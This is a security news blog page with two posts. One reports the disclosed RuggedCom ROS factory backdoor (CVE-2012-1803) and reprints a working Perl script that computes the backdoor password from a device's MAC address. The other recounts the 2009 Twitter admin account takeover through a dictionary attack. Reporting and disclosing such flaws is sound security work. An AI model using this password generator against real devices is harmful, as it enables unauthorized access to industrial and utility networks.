Your security, networking, programming, and application news source.
Google
Showing posts with label cracking. Show all posts
Showing posts with label cracking. Show all posts

Tuesday, April 24, 2012

RuggedCom Unresponsive, Rugged Operating System (ROS®) Backdoor Disclosed

A factory backdoor account in RuggedCom's Rugged Operating System (ROS®) has been disclosed. <RuggedCom> is a manufacturer of rugged networking equipment popular in industrial, utility, and defense industries. These sensitive consumers of frequently security sensitive networking devices have recently been informed by RuggedCom, who has acknowledged the backdoor. Due somewhat to RuggedCom's unresponsiveness after acknowledgement, this information was publicly disclosed. According to the disclosure, an undocumented account, "factory", which cannot be disabled, is included in all released versions of ROS® with a password generated from the device's MAC address.

<Secunia - Full Disclosure CVE-2012-1803 (April 23, 2012)>

#!/usr/bin/perl
if (! defined $ARGV[0]) {
print "+========================================== \n";
print "+ RuggedCom ROS Backdoor Password Generator \n";
print "+ JC CREW April 23 2012 \n";
print "+ Usage:\n$0 macaddress \n";
print "+========================================== \n";
exit; }
$a = $ARGV[0];
$a =~  s/[^A-F0-9]+//simg;
@b = reverse split /(\S{2})/,$a;
$c = join "", @b;
$c .= "0000";
$d = hex($c) % 999999929;
print "$d\n";

Wednesday, January 7, 2009

Happiness P0wns Twitter

  About a week after the new year, <Twitter> had several high profile accounts (Tech Crunch)<taken and defaced>. Obama, FoxNews, Miley Cyrus, and Britney Spears, just to name a few, had lewd comments or questionable links posted. Miley Cyrus (Hannah Montana) had a (YouTube)<video memorial> hoaxing her death made widely public by <MTV> (who didn't fall for it).
  This event was quickly tracked back to a hacker forum called <Digital Gangster>. An 18 year old hacker calling himself GMZ took credit for the hack. He gave an interview of his account to Threat Level, who verified his story with video of his administration access.
  GMZ claimed that he merely made a dictionary attack program/script and pointed it at a popular Twitter user named "Crystal". After only one night the administrative account was cracked with the epically stupid password "Happiness". That's pretty ridiculous that the system allows such weak passwords, especially for administrative accounts, but its worse. GMZ claims that Twitter has no limitation on log-in attempts. When he realized the account he cracked was an administrative account and that he hadn't bothered using a proxy, he decided not to take any accounts himself. He merely took requests to reset account passwords and tossed them on Digital Gangster. Digital Gangster quickly deleted the related posts, but not before some quite entertaining mayhem took place.

<Wired Blog - Weak Password Brings 'Happiness' to Twitter Hacker>